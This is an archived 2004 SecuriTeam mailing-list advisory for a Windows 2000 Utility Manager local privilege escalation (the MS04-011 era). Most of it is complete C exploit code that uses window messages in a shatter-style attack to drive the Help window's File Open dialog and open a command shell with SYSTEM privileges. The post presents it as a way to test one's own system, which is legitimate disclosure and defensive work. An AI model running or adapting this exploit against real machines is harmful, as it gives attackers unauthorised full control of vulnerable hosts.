[EXPL] Utility Manager Local Privileges Escalation Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/18/04

  • Next message: SecuriTeam: "[NT] Microsoft Windows Utility Manager Vulnerability (MS04-11)"
    To: list@securiteam.com
    Date: 18 Apr 2004 10:47:27 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Utility Manager Local Privileges Escalation Exploit
    ------------------------------------------------------------------------

    SUMMARY

    The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with
    system privileges, which allows local users to execute arbitrary code via
    a "Shatter" style attack using Windows messages, as demonstrated using the
    File Open dialog in the Help window. The following exploit code can be
    used to test your system for the mentioned vulnerability.

    DETAILS

    Exploit:
    // By Cesar Cerrudo cesar appsecinc com
    // Local elevation of priviliges exploit for Windows Utility Manager
    // Gives you a shell with system privileges
    // If you have problems try changing Sleep() values.

    #include <stdio.h>
    #include <windows.h>
    #include <commctrl.h>
    #include <Winuser.h>

    int main(int argc, char *argv[])
    {
      HWND lHandle, lHandle2;
      POINT point;

      char sText[]="%windir%\\system32\\cmd.ex?";

      // run utility manager
      system("utilman.exe /start");
      Sleep(500);

      // execute contextual help
      SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
      Sleep(500);

      // open file open dialog windown in Windows Help
      PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
      Sleep(500);

      // find open file dialog window
      lHandle = FindWindow("#32770","Open");

      // get input box handle
      lHandle2 = GetDlgItem(lHandle, 0x47C);
      Sleep(500);

      // set text to filter listview to display only cmd.exe
      SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
      Sleep(800);

      // send return
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

      //get navigation bar handle
      lHandle2 = GetDlgItem(lHandle, 0x4A0);
      //send tab
      SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
      Sleep(500);
      lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
      //get list view handle
      lHandle2 = GetDlgItem(lHandle2, 0x1);

      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
      SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
      Sleep(500);
      
      // popup context menu
      PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
      Sleep(1000);

      // get context menu handle
      point.x =10; point.y =30;
      lHandle2=WindowFromPoint(point);

      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
      SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

      SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

      return(0);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:cesar@appsecinc.com> Cesar
    Cerrudo.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Microsoft Windows Utility Manager Vulnerability (MS04-11)"

    Relevant Pages

    • [NT] Windows Embedded Open Type (EOT) Font Heap Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in the way that Windows uncompresses Embedded Open Type ... fonts allow the author of a malicious web page to execute arbitrary code ... A heap overflow vulnerability exists in T2EMBED.DLL, ...
      (Securiteam)
    • [NT] Windows VDM #UD Local Privilege Escalation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability to fully compromise a Windows NT 4.0, Windows 2000, Windows ... 32-bit VDM "host" code, and the invalid opcode fault handler within the ... process).The kernel does not validate the address to which execution is ...
      (Securiteam)
    • [NT] Microsoft Windows Color Management Module Heap Buffer Overflow Vulnerability (MS08-046)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Windows Color Management Module Heap Buffer Overflow ... vulnerability in multiple versions of Microsoft Corp.'s Windows operating ... Keep in mind that this only blocks the attack vector through Windows ...
      (Securiteam)
    • [NT] Windows Workstation Service Remote Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Windows Workstation Creates and maintains client network connections ... the log file. ... The string arguments for this logging function are supplied as ...
      (Securiteam)
    • [REVS] Removing about:blank Homepage Hijacker
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... expanded with almost a dozen other checks against hijacker tricks. ... To Remove "About:Blank" Hijacker Adware In Windows XP Home edition Service ... The "value" window reveals the hidden file name. ...
      (Securiteam)